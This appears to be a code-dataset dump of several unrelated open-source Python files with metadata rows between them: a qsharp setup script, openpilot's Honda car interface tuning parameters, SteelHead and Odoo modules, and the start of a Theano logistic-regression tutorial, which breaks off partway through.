# version.py: Specifies the version of the qsharp package.
##
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
##
__version__ = "{version}"
is_conda = False
_user_agent_extra = "[{version}]"
''')
## DESCRIPTION ##
# The long description metadata passed to setuptools is used to populate the
# PyPI page for this package. Thus, we'll generate the description by using the
# same README.md file that we use in the GitHub repo.
with open("./README.md", "r") as fh:
long_description = fh.read()
## SETUPTOOLS INVOCATION ##
setuptools.setup(
name="qsharp-core",
version=version,
author="Microsoft",
author_email="que-contacts@microsoft.com",
description="Python client for Q#, a domain-specific quantum programming language",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/microsoft/iqsharp",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=[
'jupyter_client',
'pyzmq<20.0.0' # due to incompatibility of IQ# with pyzmq>=20.0.0
]
)
| 29.794118 | 87 | 0.699408 |
03074b875c107a69650d8885bf8e3b0d83c216f9 | 20,505 | py | Python | selfdrive/car/honda/interface.py | shoes22/openpilot | a965de3c96a53b67d106cfa775e3407db82dd0e1 | [
"MIT"
] | 53 | 2018-07-31T04:26:48.000Z | 2022-03-29T08:50:06.000Z | selfdrive/car/honda/interface.py | shoes22/openpilot | a965de3c96a53b67d106cfa775e3407db82dd0e1 | [
"MIT"
] | 47 | 2018-07-21T15:31:51.000Z | 2022-03-25T10:21:24.000Z | selfdrive/car/honda/interface.py | shoes22/openpilot | a965de3c96a53b67d106cfa775e3407db82dd0e1 | [
"MIT"
] | 124 | 2018-09-05T18:32:30.000Z | 2022-03-13T16:30:50.000Z | #!/usr/bin/env python3
from cereal import car
from panda import Panda
from common.numpy_fast import interp
from common.params import Params
from selfdrive.car.honda.values import CarControllerParams, CruiseButtons, HondaFlags, CAR, HONDA_BOSCH, HONDA_NIDEC_ALT_SCM_MESSAGES, HONDA_BOSCH_ALT_BRAKE_SIGNAL
from selfdrive.car import STD_CARGO_KG, CivicParams, scale_rot_inertia, scale_tire_stiffness, gen_empty_fingerprint, get_safety_config
from selfdrive.car.interfaces import CarInterfaceBase
from selfdrive.car.disable_ecu import disable_ecu
from selfdrive.config import Conversions as CV
ButtonType = car.CarState.ButtonEvent.Type
EventName = car.CarEvent.EventName
TransmissionType = car.CarParams.TransmissionType
class CarInterface(CarInterfaceBase):
@staticmethod
def get_pid_accel_limits(CP, current_speed, cruise_speed):
if CP.carFingerprint in HONDA_BOSCH:
return CarControllerParams.BOSCH_ACCEL_MIN, CarControllerParams.BOSCH_ACCEL_MAX
else:
# NIDECs don't allow acceleration near cruise_speed,
# so limit limits of pid to prevent windup
ACCEL_MAX_VALS = [CarControllerParams.NIDEC_ACCEL_MAX, 0.2]
ACCEL_MAX_BP = [cruise_speed - 2., cruise_speed - .2]
return CarControllerParams.NIDEC_ACCEL_MIN, interp(current_speed, ACCEL_MAX_BP, ACCEL_MAX_VALS)
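  # Hedged illustration (added): with cruise_speed = 20 m/s the upper accel
  # limit interpolates from NIDEC_ACCEL_MAX below 18 m/s down to 0.2 m/s^2 at
  # 19.8 m/s and above, which keeps the longitudinal PID from winding up as
  # the car approaches the set speed.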
@staticmethod
def get_params(candidate, fingerprint=gen_empty_fingerprint(), car_fw=[]): # pylint: disable=dangerous-default-value
ret = CarInterfaceBase.get_std_params(candidate, fingerprint)
ret.carName = "honda"
if candidate in HONDA_BOSCH:
ret.safetyConfigs = [get_safety_config(car.CarParams.SafetyModel.hondaBosch)]
ret.radarOffCan = True
# Disable the radar and let openpilot control longitudinal
# WARNING: THIS DISABLES AEB!
ret.openpilotLongitudinalControl = Params().get_bool("DisableRadar")
ret.pcmCruise = not ret.openpilotLongitudinalControl
else:
ret.safetyConfigs = [get_safety_config(car.CarParams.SafetyModel.hondaNidec)]
ret.enableGasInterceptor = 0x201 in fingerprint[0]
ret.openpilotLongitudinalControl = True
ret.pcmCruise = not ret.enableGasInterceptor
ret.communityFeature = ret.enableGasInterceptor
if candidate == CAR.CRV_5G:
ret.enableBsm = 0x12f8bfa7 in fingerprint[0]
# Detect Bosch cars with new HUD msgs
if any(0x33DA in f for f in fingerprint.values()):
ret.flags |= HondaFlags.BOSCH_EXT_HUD.value
# Accord 1.5T CVT has different gearbox message
if candidate == CAR.ACCORD and 0x191 in fingerprint[1]:
ret.transmissionType = TransmissionType.cvt
# Certain Hondas have an extra steering sensor at the bottom of the steering rack,
# which improves controls quality as it removes the steering column torsion from feedback.
# Tire stiffness factor fictitiously lower if it includes the steering column torsion effect.
# For modeling details, see p.198-200 in "The Science of Vehicle Dynamics (2014), M. Guiggiani"
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0], [0]]
ret.lateralTuning.pid.kiBP, ret.lateralTuning.pid.kpBP = [[0.], [0.]]
ret.lateralTuning.pid.kf = 0.00006 # conservative feed-forward
if candidate in HONDA_BOSCH:
ret.longitudinalTuning.kpV = [0.25]
ret.longitudinalTuning.kiV = [0.05]
ret.longitudinalActuatorDelayUpperBound = 0.5 # s
else:
# default longitudinal tuning for all hondas
ret.longitudinalTuning.kpBP = [0., 5., 35.]
ret.longitudinalTuning.kpV = [1.2, 0.8, 0.5]
ret.longitudinalTuning.kiBP = [0., 35.]
ret.longitudinalTuning.kiV = [0.18, 0.12]
eps_modified = False
for fw in car_fw:
if fw.ecu == "eps" and b"," in fw.fwVersion:
eps_modified = True
if candidate == CAR.CIVIC:
stop_and_go = True
ret.mass = CivicParams.MASS
ret.wheelbase = CivicParams.WHEELBASE
ret.centerToFront = CivicParams.CENTER_TO_FRONT
ret.steerRatio = 15.38 # 10.93 is end-to-end spec
if eps_modified:
# stock request input values: 0x0000, 0x00DE, 0x014D, 0x01EF, 0x0290, 0x0377, 0x0454, 0x0610, 0x06EE
# stock request output values: 0x0000, 0x0917, 0x0DC5, 0x1017, 0x119F, 0x140B, 0x1680, 0x1680, 0x1680
# modified request output values: 0x0000, 0x0917, 0x0DC5, 0x1017, 0x119F, 0x140B, 0x1680, 0x2880, 0x3180
# stock filter output values: 0x009F, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108
# modified filter output values: 0x009F, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0108, 0x0400, 0x0480
# note: max request allowed is 4096, but request is capped at 3840 in firmware, so modifications result in 2x max
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560, 8000], [0, 2560, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.1]]
else:
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560], [0, 2560]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[1.1], [0.33]]
tire_stiffness_factor = 1.
elif candidate in (CAR.CIVIC_BOSCH, CAR.CIVIC_BOSCH_DIESEL):
stop_and_go = True
ret.mass = CivicParams.MASS
ret.wheelbase = CivicParams.WHEELBASE
ret.centerToFront = CivicParams.CENTER_TO_FRONT
ret.steerRatio = 15.38 # 10.93 is end-to-end spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 1.
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
elif candidate in (CAR.ACCORD, CAR.ACCORDH):
stop_and_go = True
ret.mass = 3279. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.83
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 16.33 # 11.82 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.8467
if eps_modified:
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.3], [0.09]]
else:
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
elif candidate == CAR.ACURA_ILX:
stop_and_go = False
ret.mass = 3095. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.67
ret.centerToFront = ret.wheelbase * 0.37
ret.steerRatio = 18.61 # 15.3 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.72
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
elif candidate in (CAR.CRV, CAR.CRV_EU):
stop_and_go = False
ret.mass = 3572. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.62
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 16.89 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 1000], [0, 1000]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.CRV_5G:
stop_and_go = True
ret.mass = 3410. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.66
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 16.0 # 12.3 is spec end-to-end
if eps_modified:
# stock request input values: 0x0000, 0x00DB, 0x01BB, 0x0296, 0x0377, 0x0454, 0x0532, 0x0610, 0x067F
# stock request output values: 0x0000, 0x0500, 0x0A15, 0x0E6D, 0x1100, 0x1200, 0x129A, 0x134D, 0x1400
# modified request output values: 0x0000, 0x0500, 0x0A15, 0x0E6D, 0x1100, 0x1200, 0x1ACD, 0x239A, 0x2800
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560, 10000], [0, 2560, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.21], [0.07]]
else:
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.64], [0.192]]
tire_stiffness_factor = 0.677
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.CRV_HYBRID:
stop_and_go = True
ret.mass = 1667. + STD_CARGO_KG # mean of 4 models in kg
ret.wheelbase = 2.66
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 16.0 # 12.3 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.677
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.FIT:
stop_and_go = False
ret.mass = 2644. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.53
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 13.06
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.75
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]]
elif candidate == CAR.FREED:
stop_and_go = False
ret.mass = 3086. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.74
# the remaining parameters were copied from FIT
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 13.06
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]]
tire_stiffness_factor = 0.75
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]]
elif candidate == CAR.HRV:
stop_and_go = False
ret.mass = 3125 * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.61
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 15.2
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]]
tire_stiffness_factor = 0.5
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.16], [0.025]]
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.ACURA_RDX:
stop_and_go = False
ret.mass = 3935. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.68
ret.centerToFront = ret.wheelbase * 0.38
ret.steerRatio = 15.0 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 1000], [0, 1000]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
elif candidate == CAR.ACURA_RDX_3G:
stop_and_go = True
ret.mass = 4068. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.75
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 11.95 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
tire_stiffness_factor = 0.677
elif candidate == CAR.ODYSSEY:
stop_and_go = False
ret.mass = 4471. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 3.00
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 14.35 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.28], [0.08]]
elif candidate == CAR.ODYSSEY_CHN:
stop_and_go = False
ret.mass = 1849.2 + STD_CARGO_KG # mean of 4 models in kg
ret.wheelbase = 2.90
ret.centerToFront = ret.wheelbase * 0.41 # from CAR.ODYSSEY
ret.steerRatio = 14.35
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 32767], [0, 32767]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.28], [0.08]]
elif candidate in (CAR.PILOT, CAR.PILOT_2019):
stop_and_go = False
ret.mass = 4204. * CV.LB_TO_KG + STD_CARGO_KG # average weight
ret.wheelbase = 2.82
ret.centerToFront = ret.wheelbase * 0.428
ret.steerRatio = 17.25 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]]
elif candidate == CAR.PASSPORT:
stop_and_go = False
ret.mass = 4204. * CV.LB_TO_KG + STD_CARGO_KG # average weight
ret.wheelbase = 2.82
ret.centerToFront = ret.wheelbase * 0.428
ret.steerRatio = 17.25 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]]
elif candidate == CAR.RIDGELINE:
stop_and_go = False
ret.mass = 4515. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 3.18
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 15.59 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]]
elif candidate == CAR.INSIGHT:
stop_and_go = True
ret.mass = 2987. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.7
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 15.0 # 12.58 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
elif candidate == CAR.HONDA_E:
stop_and_go = True
ret.mass = 3338.8 * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.5
ret.centerToFront = ret.wheelbase * 0.5
ret.steerRatio = 16.71
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]] # TODO: can probably use some tuning
else:
raise ValueError("unsupported car %s" % candidate)
# These cars use alternate user brake msg (0x1BE)
if candidate in HONDA_BOSCH_ALT_BRAKE_SIGNAL:
ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_ALT_BRAKE
# These cars use alternate SCM messages (SCM_FEEDBACK AND SCM_BUTTON)
if candidate in HONDA_NIDEC_ALT_SCM_MESSAGES:
ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_NIDEC_ALT
if ret.openpilotLongitudinalControl and candidate in HONDA_BOSCH:
ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_BOSCH_LONG
# min speed to enable ACC. if car can do stop and go, then set enabling speed
# to a negative value, so it won't matter. Otherwise, add 0.5 mph margin to not
# conflict with PCM acc
ret.minEnableSpeed = -1. if (stop_and_go or ret.enableGasInterceptor) else 25.5 * CV.MPH_TO_MS
# TODO: get actual value, for now starting with reasonable value for
# civic and scaling by mass and wheelbase
ret.rotationalInertia = scale_rot_inertia(ret.mass, ret.wheelbase)
# TODO: start from empirically derived lateral slip stiffness for the civic and scale by
# mass and CG position, so all cars will have approximately similar dyn behaviors
ret.tireStiffnessFront, ret.tireStiffnessRear = scale_tire_stiffness(ret.mass, ret.wheelbase, ret.centerToFront,
tire_stiffness_factor=tire_stiffness_factor)
ret.steerActuatorDelay = 0.1
ret.steerRateCost = 0.5
ret.steerLimitTimer = 0.8
return ret
@staticmethod
def init(CP, logcan, sendcan):
if CP.carFingerprint in HONDA_BOSCH and CP.openpilotLongitudinalControl:
disable_ecu(logcan, sendcan, bus=1, addr=0x18DAB0F1, com_cont_req=b'\x28\x83\x03')
# returns a car.CarState
def update(self, c, can_strings):
# ******************* do can recv *******************
self.cp.update_strings(can_strings)
self.cp_cam.update_strings(can_strings)
if self.cp_body:
self.cp_body.update_strings(can_strings)
ret = self.CS.update(self.cp, self.cp_cam, self.cp_body)
ret.canValid = self.cp.can_valid and self.cp_cam.can_valid and (self.cp_body is None or self.cp_body.can_valid)
ret.yawRate = self.VM.yaw_rate(ret.steeringAngleDeg * CV.DEG_TO_RAD, ret.vEgo)
buttonEvents = []
if self.CS.cruise_buttons != self.CS.prev_cruise_buttons:
be = car.CarState.ButtonEvent.new_message()
be.type = ButtonType.unknown
if self.CS.cruise_buttons != 0:
be.pressed = True
but = self.CS.cruise_buttons
else:
be.pressed = False
but = self.CS.prev_cruise_buttons
if but == CruiseButtons.RES_ACCEL:
be.type = ButtonType.accelCruise
elif but == CruiseButtons.DECEL_SET:
be.type = ButtonType.decelCruise
elif but == CruiseButtons.CANCEL:
be.type = ButtonType.cancel
elif but == CruiseButtons.MAIN:
be.type = ButtonType.altButton3
buttonEvents.append(be)
if self.CS.cruise_setting != self.CS.prev_cruise_setting:
be = car.CarState.ButtonEvent.new_message()
be.type = ButtonType.unknown
if self.CS.cruise_setting != 0:
be.pressed = True
but = self.CS.cruise_setting
else:
be.pressed = False
but = self.CS.prev_cruise_setting
if but == 1:
be.type = ButtonType.altButton1
# TODO: more buttons?
buttonEvents.append(be)
ret.buttonEvents = buttonEvents
# events
events = self.create_common_events(ret, pcm_enable=False)
if self.CS.brake_error:
events.add(EventName.brakeUnavailable)
if self.CS.park_brake:
events.add(EventName.parkBrake)
if self.CP.pcmCruise and ret.vEgo < self.CP.minEnableSpeed:
events.add(EventName.belowEngageSpeed)
if self.CP.pcmCruise:
# we engage when pcm is active (rising edge)
if ret.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
events.add(EventName.pcmEnable)
elif not ret.cruiseState.enabled and (c.actuators.accel >= 0. or not self.CP.openpilotLongitudinalControl):
# it can happen that car cruise disables while comma system is enabled: need to
# keep braking if needed or if the speed is very low
if ret.vEgo < self.CP.minEnableSpeed + 2.:
# non loud alert if cruise disables below 25mph as expected (+ a little margin)
events.add(EventName.speedTooLow)
else:
events.add(EventName.cruiseDisabled)
if self.CS.CP.minEnableSpeed > 0 and ret.vEgo < 0.001:
events.add(EventName.manualRestart)
# handle button presses
for b in ret.buttonEvents:
# do enable on both accel and decel buttons
if b.type in [ButtonType.accelCruise, ButtonType.decelCruise] and not b.pressed:
if not self.CP.pcmCruise:
events.add(EventName.buttonEnable)
# do disable on button down
if b.type == ButtonType.cancel and b.pressed:
events.add(EventName.buttonCancel)
ret.events = events.to_msg()
self.CS.out = ret.as_reader()
return self.CS.out
# pass in a car.CarControl
# to be called @ 100hz
def apply(self, c):
if c.hudControl.speedVisible:
hud_v_cruise = c.hudControl.setSpeed * CV.MS_TO_KPH
else:
hud_v_cruise = 255
can_sends = self.CC.update(c.enabled, c.active, self.CS, self.frame,
c.actuators,
c.cruiseControl.cancel,
hud_v_cruise,
c.hudControl.lanesVisible,
hud_show_car=c.hudControl.leadVisible,
hud_alert=c.hudControl.visualAlert)
self.frame += 1
return can_sends
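# --- Illustrative sketch (not part of openpilot) -----------------------------
# The lateralParams.torqueBP / torqueV pairs set throughout get_params() form a
# breakpoint table: torqueBP holds steering-torque breakpoints and torqueV the
# values the EPS is allowed to output. The helper below is a made-up example of
# how such a table can be evaluated with linear interpolation; it is only an
# illustration, not something openpilot itself does in this file.
def _example_torque_table_lookup(requested=6000):
  import numpy as np
  torque_bp = [0, 2560, 10000]  # e.g. the modified CR-V 5G table above
  torque_v = [0, 2560, 3840]
  # np.interp interpolates linearly inside the table and clamps outside it
  return float(np.interp(requested, torque_bp, torque_v))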
| 45.465632 | 163 | 0.674762 |
4a7b23dde1a5c9845c0a9350805145cd32c7dbf0 | 396 | py | Python | steelscript/steelhead/core/__init__.py | riverbed/steelscript-steelhead | 7158578f7ad97eaff9968b2aca82da2d322284ba | [
"MIT"
] | 3 | 2016-04-08T03:27:08.000Z | 2019-08-14T07:01:54.000Z | steelscript/steelhead/core/__init__.py | riverbed/steelscript-steelhead | 7158578f7ad97eaff9968b2aca82da2d322284ba | [
"MIT"
] | null | null | null | steelscript/steelhead/core/__init__.py | riverbed/steelscript-steelhead | 7158578f7ad97eaff9968b2aca82da2d322284ba | [
"MIT"
] | 3 | 2018-05-22T14:52:47.000Z | 2020-09-23T01:07:00.000Z | # Copyright (c) 2019 Riverbed Technology, Inc.
#
# This software is licensed under the terms and conditions of the MIT License
# accompanying the software ("License"). This software is distributed "AS IS"
# as set forth in the License.
"""
The SteelHead package offers a set of interfaces to control and work with
a SteelHead appliance.
"""
from steelscript.steelhead.core.steelhead import *
| 28.285714 | 78 | 0.762626 |
cc423c2d3a5e722e189db55f69a7b391acde6dbf | 1,087 | py | Python | addons/account/models/res_users.py | jjiege/odoo | fd5b8ad387c1881f349d125cbd56433f4d49398f | [
"MIT"
] | null | null | null | addons/account/models/res_users.py | jjiege/odoo | fd5b8ad387c1881f349d125cbd56433f4d49398f | [
"MIT"
] | null | null | null | addons/account/models/res_users.py | jjiege/odoo | fd5b8ad387c1881f349d125cbd56433f4d49398f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, models, _
from odoo.exceptions import ValidationError
class Users(models.Model):
_inherit = "res.users"
@api.multi
@api.constrains('groups_id')
def _check_one_user_type(self):
super(Users, self)._check_one_user_type()
g1 = self.env.ref('account.group_show_line_subtotals_tax_included', False)
g2 = self.env.ref('account.group_show_line_subtotals_tax_excluded', False)
if not g1 or not g2:
# A user cannot be in a non-existant group
return
if self._has_multiple_groups([g1.id, g2.id]):
raise ValidationError(_("A user cannot have both Tax B2B and Tax B2C.\n"
"You should go in General Settings, and choose to display Product Prices\n"
"either in 'Tax-Included' or in 'Tax-Excluded' mode\n"
"(or switch twice the mode if you are already in the desired one)."))
| 38.821429 | 111 | 0.620975 |
599f56583bc4faa499d44931c73abfb965a9026e | 16,081 | py | Python | code/model/mlp/logistic_sgd.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | 92 | 2016-03-05T23:33:13.000Z | 2022-01-12T11:44:16.000Z | logistic_sgd.py | deepanjanroy/aml3 | e70999c77a8d4d9c40cdceb1168922e5cd5ea40d | [
"MIT"
] | 4 | 2016-06-03T14:07:19.000Z | 2018-11-18T14:04:57.000Z | logistic_sgd.py | deepanjanroy/aml3 | e70999c77a8d4d9c40cdceb1168922e5cd5ea40d | [
"MIT"
] | 46 | 2016-05-25T13:59:30.000Z | 2022-02-08T12:10:33.000Z | """
This tutorial introduces logistic regression using Theano and stochastic
gradient descent.
Logistic regression is a probabilistic, linear classifier. It is parametrized
by a weight matrix :math:`W` and a bias vector :math:`b`. Classification is
done by projecting data points onto a set of hyperplanes, the distance to
which is used to determine a class membership probability.
Mathematically, this can be written as:
.. math::
P(Y=i|x, W,b) &= softmax_i(W x + b) \\
&= \frac {e^{W_i x + b_i}} {\sum_j e^{W_j x + b_j}}
The output of the model or prediction is then done by taking the argmax of
the vector whose i'th element is P(Y=i|x).
.. math::
y_{pred} = argmax_i P(Y=i|x,W,b)
This tutorial presents a stochastic gradient descent optimization method
suitable for large datasets.
References:
- textbooks: "Pattern Recognition and Machine Learning" -
Christopher M. Bishop, section 4.3.2
"""
__docformat__ = 'restructuredtext en'
import cPickle
import gzip
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
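# --- Illustrative sketch (not part of the original tutorial) -----------------
# The module docstring above defines P(Y=i|x, W, b) as a softmax over W x + b
# and the prediction as its argmax. Written out with plain numpy for a single
# input vector (all numbers and the function name are made up):
def _softmax_prediction_sketch():
    W = numpy.array([[0.1, -0.2],
                     [0.4, 0.3],
                     [-0.5, 0.2]])        # shape (n_in=3, n_out=2)
    b = numpy.array([0.05, -0.05])
    x = numpy.array([1.0, 2.0, 0.5])
    scores = numpy.dot(x, W) + b
    p_y_given_x = numpy.exp(scores) / numpy.sum(numpy.exp(scores))
    y_pred = numpy.argmax(p_y_given_x)
    return p_y_given_x, y_pred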
class LogisticRegression(object):
"""Multi-class Logistic Regression Class
The logistic regression is fully described by a weight matrix :math:`W`
and bias vector :math:`b`. Classification is done by projecting data
points onto a set of hyperplanes, the distance to which is used to
determine a class membership probability.
"""
def __init__(self, input, n_in, n_out):
""" Initialize the parameters of the logistic regression
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
# start-snippet-1
# initialize with 0 the weights W as a matrix of shape (n_in, n_out)
self.W = theano.shared(
value=numpy.zeros(
(n_in, n_out),
dtype=theano.config.floatX
),
name='W',
borrow=True
)
# initialize the baises b as a vector of n_out 0s
self.b = theano.shared(
value=numpy.zeros(
(n_out,),
dtype=theano.config.floatX
),
name='b',
borrow=True
)
# symbolic expression for computing the matrix of class-membership
# probabilities
# Where:
# W is a matrix where column-k represents the separation hyperplane for
# class-k
# x is a matrix where row-j represents input training sample-j
# b is a vector where element-k represents the free parameter of
# hyperplane-k
self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)
# symbolic description of how to compute prediction as class whose
# probability is maximal
self.y_pred = T.argmax(self.p_y_given_x, axis=1)
# end-snippet-1
# parameters of the model
self.params = [self.W, self.b]
def negative_log_likelihood(self, y):
"""Return the mean of the negative log-likelihood of the prediction
of this model under a given target distribution.
.. math::
\frac{1}{|\mathcal{D}|} \mathcal{L} (\theta=\{W,b\}, \mathcal{D}) =
\frac{1}{|\mathcal{D}|} \sum_{i=0}^{|\mathcal{D}|}
\log(P(Y=y^{(i)}|x^{(i)}, W,b)) \\
\ell (\theta=\{W,b\}, \mathcal{D})
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
Note: we use the mean instead of the sum so that
the learning rate is less dependent on the batch size
"""
# start-snippet-2
# y.shape[0] is (symbolically) the number of rows in y, i.e.,
# number of examples (call it n) in the minibatch
# T.arange(y.shape[0]) is a symbolic vector which will contain
# [0,1,2,... n-1] T.log(self.p_y_given_x) is a matrix of
# Log-Probabilities (call it LP) with one row per example and
# one column per class LP[T.arange(y.shape[0]),y] is a vector
# v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,
# LP[n-1,y[n-1]]] and T.mean(LP[T.arange(y.shape[0]),y]) is
# the mean (across minibatch examples) of the elements in v,
# i.e., the mean log-likelihood across the minibatch.
return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])
# end-snippet-2
def errors(self, y):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
"""
# check if y has same dimension of y_pred
if y.ndim != self.y_pred.ndim:
raise TypeError(
'y should have the same shape as self.y_pred',
('y', y.type, 'y_pred', self.y_pred.type)
)
# check if y is of the correct datatype
if y.dtype.startswith('int'):
# the T.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return T.mean(T.neq(self.y_pred, y))
else:
raise NotImplementedError()
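# --- Illustrative sketch (not part of the original tutorial) -----------------
# negative_log_likelihood above relies on the advanced-indexing trick
# LP[T.arange(y.shape[0]), y]. The same computation in plain numpy for a tiny
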